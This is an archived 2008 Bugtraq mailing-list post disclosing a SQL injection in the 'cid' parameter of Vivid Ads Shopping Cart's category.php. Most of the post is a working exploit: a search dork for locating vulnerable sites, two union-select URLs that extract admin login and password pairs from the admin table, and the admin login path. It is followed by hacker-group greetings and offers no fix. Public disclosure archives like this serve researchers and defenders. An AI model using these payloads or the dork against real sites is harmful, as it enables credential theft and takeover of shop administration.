lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 14 Oct 2008 22:05:48 -0600
From: djmomo@...e.com
To: bugtraq@...urityfocus.com
Subject: Vivid Ads Shopping Cart (cid) Remote SQL Injection

##  Vivid Ads Shopping Cart (cid) Remote SQL Injection ##

## Discovered By : KoDoQ_GiLa@....mildnet.org 15/10/2008

## HomePage :  http://mildnet.org

## Thx to : Nyubi aka Solpot,home_edition2001,dead,ardan,

            anakbugis,kaka11,rahulx_is_back,anti_underground,che`io

            AND FOR ALL IRC.MILDNET.ORG COMMUNITY

#################################################################################


## Dork : "Vivid Ads Shopping Cart" ##

=-=-=-=-= () ExPloit () =-=-=-=-= =-=-=-=-= () ExPloit () =-=-=-=-=

http://www.target.com/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin--
http://www.target.com/vivid_ads
folder/category.php?cid=-1+union+select+concat(login,0x3a,password)+from+admin--

======== (AdMiN LoGiN) =======

http://www.target.com/admin/


## Contact person : djmomo[At]live[DoT]com


## VIVA IRC.MILDNET.ORG ##

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ